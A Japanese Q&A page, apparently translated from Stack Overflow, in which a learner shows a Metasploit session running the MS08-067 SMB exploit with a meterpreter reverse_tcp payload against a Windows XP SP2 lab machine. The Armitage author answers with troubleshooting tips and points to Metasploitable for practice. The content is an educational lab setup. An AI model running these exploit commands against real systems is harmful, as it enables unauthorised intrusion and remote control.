0

構造などの一般的な理解を得るために、アーミテージから始めてMetasploitフレームワークを学んでいます。エクスプロイトを実行しようとすると、古い Windowx XP sp2 をハッキングしようとしました。

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf  exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf  exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf  exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf  exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf  exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

エラーは発生しませんが、そこで停止し、エクスプロイトを実行しません。

4

2 に答える 2

0

アーミテージを書きました。次の点に注意してください。

  • ms08_067_netapi は、パッチが適用されていない Windows XP システムに対する信頼性の高いエクスプロイトです。ただし、リモート エクスプロイトでは、多くの問題が発生する可能性があります。ターゲット システムを再起動してみて、ホストベースのファイアウォールがオフになっていることを確認してください。それでも機能しない場合は、XP システムにパッチが適用されている可能性があります。肩をすくめる

  • この SO 投稿のタイトルが BackTrack Linux に言及していることに気付きました。アーミテージは、BackTrack Linux ではサポートされなくなりました。Metasploit フレームワークは、2013 年 4 月に主要な依存関係の変化を経験し、BackTrack Linux 環境を破壊しました。Kali Linux への移行を検討してください。これは、BackTrack Linux の後継です。

Google for Kali Linux [2つ以上のリンクを提供する「評判」ポイントはありません]

  • アーミテージと Metasploit フレームワークの最適な「最初のターゲット」は Metasploitable です。これは無料の Linux 仮想マシンで、Metasploit チームが利用できます。いくつかの脆弱性と設定ミスが組み込まれています。ここからダウンロードできます:

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

  • アーミテージ入門チュートリアルを書きました。このチュートリアルでは、Metasploitable 仮想マシンに対するいくつかの攻撃について説明します。

http://blog.strategiccyber.com/2013/02/06/getting-started-with-armitage-and-the-metasploit-framework-2013/

于 2013-12-19T16:49:45.110 に答える